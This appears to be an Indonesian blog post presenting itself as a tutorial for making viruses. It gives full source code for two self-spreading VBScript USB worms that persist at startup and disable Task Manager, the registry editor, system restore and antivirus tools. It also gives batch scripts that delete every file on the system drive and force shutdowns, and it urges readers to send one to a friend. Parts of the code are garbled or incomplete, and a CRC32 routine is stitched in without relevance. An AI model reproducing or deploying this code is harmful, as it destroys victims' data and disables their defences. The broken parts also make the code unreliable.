Virus Kalong :
on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- k4l0n6.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 39
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\k4l0n6.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes = 39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set kalong = createobject("WScript.Shell")
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE KALONG v.s. ZAY "
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe."
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0n6.dll.vbs "
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Kalong"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs
Cara membuat autorun.inf [autorun]
open=nama_file.* (*dapat berupa apa saja. Contoh, k4l0n6.dll.vbs) save dengan autorun.inf
Virus cleaner
Berfungsi untuk menghapus semua file di komputer berikut virusnya
DEL /F /Q * save dengan [namafile].cmd
Cara membuat Virus Sendiri
================= START HERE ====================
Private crcTable(0 To 255) As Long ‘crc32
Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long
‘bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file
Dim lCurPos As Long ‘Current position untuk iterasi proses array bArrayIn
Dim lTemp As Long ‘variabel temp hasil perhitungan
If lLen = 0 Then Exit Function ‘keluar fungsi apabila ukuran file = 0
lTemp = lcrc Xor &HFFFFFFFF
For lCurPos = 0 To lLen
lTemp = (((lTemp And &HFFFFFF00) &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))
Next lCurPos
CRC32 = lTemp Xor &HFFFFFFFF
End Function
Private Function BuildTable() As Boolean
Dim i As Long, x As Long, crc As Long
Const Limit = &HEDB88320
For i = 0 To 255
crc = i
For x = 0 To 7
If crc And 1 Then
crc = (((crc And &HFFFFFFFE) 2) And &H7FFFFFFF) Xor Limit
Else
crc = ((crc And &HFFFFFFFE) 2) And &H7FFFFFFF
End If
Next x
crcTable(i) = crc
Next i
End Function
Private Sub Class_Initialize()
BuildTable
End Sub
================= END HERE ====================
Lalu ketikkan kode berikut dalam event Command1_Click :
================= START HERE ====================
Dim namaFileBuka As String, HasilCrc As String
Dim CCrc As New clsCrc ‘bikin objek baru dari class ClsCrc
Dim calCrc As Long
Dim tmp() As Byte ‘array buat file yang dibaca
Private Sub Command1_Click()
CommonDialog1.CancelError = True ‘error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = “Baca File” ‘Caption commondialog
On Error GoTo erorhandle ‘label error handle
CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 ‘buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1) - 1) As Byte ‘deklarasi ulang untuk array, # Bugs Fixed #
Get #1, , tmp()
Close #1
calCrc = UBound(tmp) ‘mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) ‘hitung CRC
HasilCrc = Hex(calCrc) ‘diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
Text1.Text = HasilCrc ‘tampilkan hasilnya
Exit Sub
erorhandle:
If Err.Number 32755 Then MsgBox Err.Description ‘error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file
================= END HERE ====================
Virus ini akan menghapus semua file saat komputer sedang Shutdown
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Simpan dengan [namafile].bat
Virus ini hanya akan meng-shutdown komputer
@echo off
shutdown -r -f -t 00
Simpan dengan [namafile].bat
Virus Mila :
dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”
set longka = createobject(”Scripting.FileSystemObject”)
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 32
set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & “\recycle.vbs”)
tf.attributes = 39
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes =32
set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)
tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
set F0nAb0530 = createobject(”WScript.Shell”)
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″
F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″
F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”
F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“
F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
3. Simpan dengan nama Mila.sys.vbs
Virus ini dapat menghapus semua file dalam komputer
@echo off
C:
cls
Echo Do you want to kill all program’s? (Y/N)
pause >nul
cls
Echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
Echo Deleting All Data
ping localhost -n 2 >nul
cls
Echo Deleting All Data.
ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Data…
cls
Echo Deleting All Data
ping localhost -n 2 >nul
cls
Echo Deleting All Data.
ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Data…
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 900 -c “you have been
:hack
echo You have just been hacked
goto hack
setelah itu, save as notepad tersebut dengan [nama].bat (bukan [nama].Txt). maka program tersebut siap dikirimkan ke komputer temanmu yang jantungan biar cepet mati.
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar